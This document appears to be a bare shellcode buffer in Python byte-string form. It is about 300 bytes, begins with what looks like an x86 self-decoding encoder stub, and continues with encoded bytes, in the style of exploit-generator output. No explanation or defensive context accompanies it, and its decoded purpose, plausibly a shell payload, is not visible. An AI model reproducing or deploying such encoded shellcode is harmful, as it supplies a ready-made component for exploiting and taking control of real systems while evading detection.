buf =  b""
buf += b"\xd9\xcd\xd9\x74\x24\xf4\xba\x17\x15\xa6\xd4\x5b"
buf += b"\x29\xc9\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x44"
buf += b"\x06\x44\x21\x96\xc0\x0a\xca\x66\x11\x6b\x42\x83"
buf += b"\x20\xab\x30\xc0\x13\x1b\x32\x84\x9f\xd0\x16\x3c"
buf += b"\x2b\x94\xbe\x33\x9c\x13\x99\x7a\x1d\x0f\xd9\x1d"
buf += b"\x9d\x52\x0e\xfd\x9c\x9c\x43\xfc\xd9\xc1\xae\xac"
buf += b"\xb2\x8e\x1d\x40\xb6\xdb\x9d\xeb\x84\xca\xa5\x08"
buf += b"\x5c\xec\x84\x9f\xd6\xb7\x06\x1e\x3a\xcc\x0e\x38"
buf += b"\x5f\xe9\xd9\xb3\xab\x85\xdb\x15\xe2\x66\x77\x58"
buf += b"\xca\x94\x89\x9d\xed\x46\xfc\xd7\x0d\xfa\x07\x2c"
buf += b"\x6f\x20\x8d\xb6\xd7\xa3\x35\x12\xe9\x60\xa3\xd1"
buf += b"\xe5\xcd\xa7\xbd\xe9\xd0\x64\xb6\x16\x58\x8b\x18"
buf += b"\x9f\x1a\xa8\xbc\xfb\xf9\xd1\xe5\xa1\xac\xee\xf5"
buf += b"\x09\x10\x4b\x7e\xa7\x45\xe6\xdd\xa0\xaa\xcb\xdd"
buf += b"\x30\xa5\x5c\xae\x02\x6a\xf7\x38\x2f\xe3\xd1\xbf"
buf += b"\x50\xde\xa6\x2f\xaf\xe1\xd6\x66\x74\xb5\x86\x10"
buf += b"\x5d\xb6\x4c\xe0\x62\x63\xc2\xb0\xcc\xdc\xa3\x60"
buf += b"\xad\x8c\x4b\x6a\x22\xf2\x6c\x95\xe8\x9b\x07\x6c"
buf += b"\x7b\x08\xc8\x76\x65\x38\xf5\x86\x98\x03\x70\x60"
buf += b"\xf0\x63\xd5\x3b\x6d\x1d\x7c\xb7\x0c\xe2\xaa\xb2"
buf += b"\x0f\x68\x59\x43\xc1\x99\x14\x57\xb6\x69\x63\x05"
buf += b"\x11\x75\x59\x21\xfd\xe4\x06\xb1\x88\x14\x91\xe6"
buf += b"\xdd\xeb\xe8\x62\xf0\x52\x43\x90\x09\x02\xac\x10"
buf += b"\xd6\xf7\x33\x99\x9b\x4c\x10\x89\x65\x4c\x1c\xfd"
buf += b"\x39\x1b\xca\xab\xff\xf5\xbc\x05\x56\xa9\x16\xc1"
buf += b"\x2f\x81\xa8\x97\x2f\xcc\x5e\x77\x81\xb9\x26\x88"
buf += b"\x2e\x2e\xaf\xf1\x52\xce\x50\x28\xd7\xfe\x1a\x70"
buf += b"\x7e\x97\xc2\xe1\xc2\xfa\xf4\xdc\x01\x03\x77\xd4"
buf += b"\xf9\xf0\x67\x9d\xfc\xbd\x2f\x4e\x8d\xae\xc5\x70"
buf += b"\x22\xce\xcf"
